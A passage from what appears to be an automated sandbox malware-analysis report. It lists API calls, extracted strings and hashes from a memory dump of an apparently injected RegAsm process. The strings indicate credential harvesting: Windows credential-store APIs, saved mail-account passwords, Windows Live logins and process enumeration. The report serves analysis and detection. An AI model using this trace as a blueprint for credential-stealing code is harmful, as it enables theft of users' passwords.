                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy$strlen
                                                                                                                                              • String ID: -journal$-wal$immutable$nolock
                                                                                                                                              • API String ID: 2619041689-3408036318
                                                                                                                                              • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                              • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                                                                              • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                                                                              • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: free$strlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 667451143-3916222277
                                                                                                                                              • Opcode ID: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                                                                              • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                                                                                                                              • Opcode Fuzzy Hash: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                                                                                                                              • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                              • wcslen.MSVCRT ref: 0040874A
                                                                                                                                              • wcsncmp.MSVCRT ref: 00408794
                                                                                                                                              • memset.MSVCRT ref: 0040882A
                                                                                                                                              • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 00408849
                                                                                                                                              • wcschr.MSVCRT ref: 0040889F
                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                              • String ID: J$Microsoft_WinInet
                                                                                                                                              • API String ID: 893589435-260894208
                                                                                                                                              • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                                                              • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                                                                              • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                                                                              • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406CA1
                                                                                                                                              • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406CBF
                                                                                                                                              • strlen.MSVCRT ref: 00406CCC
                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,00000400,?,00000000,00000000), ref: 00406CDC
                                                                                                                                              • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406CE6
                                                                                                                                              • _mbscpy.MSVCRT(?,Unknown Error,?,00000400,?,00000000,00000000), ref: 00406CF6
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                              • String ID: Unknown Error$netmsg.dll
                                                                                                                                              • API String ID: 2881943006-572158859
                                                                                                                                              • Opcode ID: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
                                                                                                                                              • Instruction ID: bcf62a4d61e6eba693f00c41f459c7331aa1a44f371262b110411e5fdf5e0d86
                                                                                                                                              • Opcode Fuzzy Hash: 3ddff6ca73234fcaad2cc89b351310259c35e619cc53eac77f1216a830b0495f
                                                                                                                                              • Instruction Fuzzy Hash: B201DF31609114BBF7051B61EE46F9FBA6CEF49790F20002AF607B1191DA78AE10969C
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNEL32(psapi.dll), ref: 00410047
                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Library$FreeLoad
                                                                                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                                                              • API String ID: 534179979-232097475
                                                                                                                                              • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                              • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                                                              • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                                                              • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                                                                              • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                                                                                                              • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                                                                                                              • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                                                • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                              • API String ID: 888011440-2039793938
                                                                                                                                              • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                                                              • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                                                              • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                                                                              • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                                                                              • too many attached databases - max %d, xrefs: 0042E951
                                                                                                                                              • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                                                                              • database is already attached, xrefs: 0042EA97
                                                                                                                                              • out of memory, xrefs: 0042EBEF
                                                                                                                                              • unable to open database: %s, xrefs: 0042EBD6
                                                                                                                                              • database %s is already in use, xrefs: 0042E9CE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpymemset
                                                                                                                                              • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                              • API String ID: 1297977491-2001300268
                                                                                                                                              • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                              • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                                                                              • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                                                                              • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                                                                • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00409C53
                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00409C6F
                                                                                                                                              • memcpy.MSVCRT(?,0wE,00000014), ref: 00409C97
                                                                                                                                              • memcpy.MSVCRT(?,0wE,00000010,?,0wE,00000014), ref: 00409CB4
                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00409D3D
                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00409D47
                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00409D7F
                                                                                                                                                • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                                                              • String ID: 0wE$d
                                                                                                                                              • API String ID: 2915808112-1552800882
                                                                                                                                              • Opcode ID: 5a88f189346dd5be2aec3c73a416be20eab0e6d765e6f29cccd2d89947c5fd10
                                                                                                                                              • Instruction ID: 1be057752684aea17f507b8882d339e9c418a93e0b7bc1648df0d3b0eb18cc96
                                                                                                                                              • Opcode Fuzzy Hash: 5a88f189346dd5be2aec3c73a416be20eab0e6d765e6f29cccd2d89947c5fd10
                                                                                                                                              • Instruction Fuzzy Hash: B4513B71A01704AFEB24DF29D542B9AB7E4FF88314F10852EE55ADB382DB74E940CB44
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                                              • strchr.MSVCRT ref: 0040327B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: PrivateProfileStringstrchr
                                                                                                                                              • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                              • API String ID: 1348940319-1729847305
                                                                                                                                              • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                              • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                                                              • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                              • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                                                              APIs
                                                                                                                                              • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                                                              • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                                                              • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memcpy
                                                                                                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                              • API String ID: 3510742995-3273207271
                                                                                                                                              • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                              • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                                                              • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                              • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                                                              APIs
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00405E80
                                                                                                                                              • GetWindow.USER32(?,00000005), ref: 00405E98
                                                                                                                                              • GetWindow.USER32(00000000), ref: 00405E9B
                                                                                                                                                • Part of subcall function 004015B0: GetWindowRect.USER32(?,?), ref: 004015BF
                                                                                                                                                • Part of subcall function 004015B0: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015DA
                                                                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00405EA7
                                                                                                                                              • GetDlgItem.USER32(?,000003ED), ref: 00405EBE
                                                                                                                                              • GetDlgItem.USER32(?,00000000), ref: 00405ED0
                                                                                                                                              • GetDlgItem.USER32(?,00000000), ref: 00405EE2
                                                                                                                                              • GetDlgItem.USER32(?,000003ED), ref: 00405EF0
                                                                                                                                              • SetFocus.USER32(00000000), ref: 00405EF3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Item$Rect$ClientFocusPoints
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2432066023-0
                                                                                                                                              • Opcode ID: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                                                                                                              • Instruction ID: 6786727c0aa7fef6bca0c81d499308ec00879f235530f9e7c86c655f771e1d73
                                                                                                                                              • Opcode Fuzzy Hash: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                                                                                                              • Instruction Fuzzy Hash: B801A571500305EFDB116F76DC8AF6BBFACEF81755F05442AB4049B191CBB8E8018A28
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                              • memset.MSVCRT ref: 0040FA1E
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                                                              • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                              • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                              • API String ID: 945165440-3589380929
                                                                                                                                              • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                              • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                                                                              • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                              • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 004094C8
                                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                                              • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                                              • memset.MSVCRT ref: 0040950C
                                                                                                                                              • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                                              • _strcmpi.MSVCRT ref: 00409531
                                                                                                                                                • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                              • String ID: sysdatetimepick32
                                                                                                                                              • API String ID: 3411445237-4169760276
                                                                                                                                              • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                                                              • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                                                              • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                                                                              • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040FE20), ref: 0040FFBF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule
                                                                                                                                              • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                              • API String ID: 4139908857-3953557276
                                                                                                                                              • Opcode ID: 8e4e43fab517c96f9a2ff6d8ac63dfc53d669fa3acf3b21c89ab0adfd667092d
                                                                                                                                              • Instruction ID: ef187524dc85a124578c70d9a5034bc1ef4a482c247f5fceb27d5c4ea416582d
                                                                                                                                              • Opcode Fuzzy Hash: 8e4e43fab517c96f9a2ff6d8ac63dfc53d669fa3acf3b21c89ab0adfd667092d
                                                                                                                                              • Instruction Fuzzy Hash: 15F06D30A007566AA7234B297C91BAB2EB89B4DB81715003BA400E6251DBE8D8C1CA6D
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 004045E8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Library$FreeLoad
                                                                                                                                              • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                              • API String ID: 534179979-4258758744
                                                                                                                                              • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                              • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                                                              • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                                                              • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                                                                              • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                                                                                • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                                                                                • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                                                                                • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                                                                              • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                                                                              • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Item$DialogMessageSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2485852401-0
                                                                                                                                              • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                                              • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                                                                                                              • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                                              • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                                                                                                              APIs
                                                                                                                                              • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                                              • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                                              • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                                              • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                                              • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                                              • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3642520215-0
                                                                                                                                              • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                              • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                                                              • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                              • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2313361498-0
                                                                                                                                              • Opcode ID: c0fd86ac5231b126ca71dbcda0134e8e863c460558ef4c97bad657530ca58ccb
                                                                                                                                              • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                                                                                                                              • Opcode Fuzzy Hash: c0fd86ac5231b126ca71dbcda0134e8e863c460558ef4c97bad657530ca58ccb
                                                                                                                                              • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                                                                                                                              APIs
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                                                                              • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                                                                              • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000015.00000002.467695671.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2126104762-0
                                                                                                                                              • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                                              • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                                                                                                                              • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                                              • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                                                                                                                              APIs
                                                                                                                                              • GetSystemMetrics.USER32(00000011), ref: 004072E7
